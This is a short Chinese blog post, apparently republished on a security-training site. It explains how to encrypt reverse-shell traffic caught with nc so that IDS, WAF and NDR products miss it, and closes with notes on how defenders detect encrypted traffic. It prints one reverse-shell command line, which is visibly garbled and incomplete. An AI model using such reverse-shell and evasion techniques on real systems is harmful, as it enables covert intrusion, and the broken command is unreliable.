nc监听反弹shell之加密流量

访客 2022年05月21日 11:27 274 0

本文来源:yunzui

写在前面

本次测试仅供学习使用，如若非法他用，与平台和本文作者无关，需自行负责！

在攻防对抗过程中的横行渗透，经常需要反弹反向shell操作，如果反弹shel过程中流量是明文传输，那么内网环境中已有的安全检测产品（WAF/IPS/IDS/NDR/HIDS）等防护软件会进行流量检测，明文传输带有明显的攻击特征。很快会被检测发现，防守方对攻击流量回溯分析，就会阻断攻击行为。

nc监听反弹shell之加密流量-第1张图片-网盾网络安全培训

反弹shell命令

bash -i> /bin/sh -i /tmp/s 2> rm /tmp/s

nc监听反弹shell之加密流量-第2张图片-网盾网络安全培训

4.通过Wireshark抓包分析流量，整个通信过程全部为加密传输

过滤端口，发现使用tls加密

nc监听反弹shell之加密流量-第3张图片-网盾网络安全培训

nc监听反弹shell之加密流量-第4张图片-网盾网络安全培训

安全的本质就是对抗！针对加密流量的检测，传统的基于特征的检测已经无法满足攻击发展的趋势，只有通过不断引入新的检测思考才能解决。

加密流量的检测，业界主流有2种方法：

第一种是将加密流量进行解密并进行检测，这需要安全检测设备充当通信双方的代理或者由客户提供单独的解密证书（只能针对该证书对应的加密流量进行解码）

第二种是在不解密的情况下进行安全检测，这通常会采用（AI）机器学习的方法。

当然对攻击行为的感知，也可以通过威胁狩猎发现。

本文地址： https://www.konghaidashi.com/post/7391.html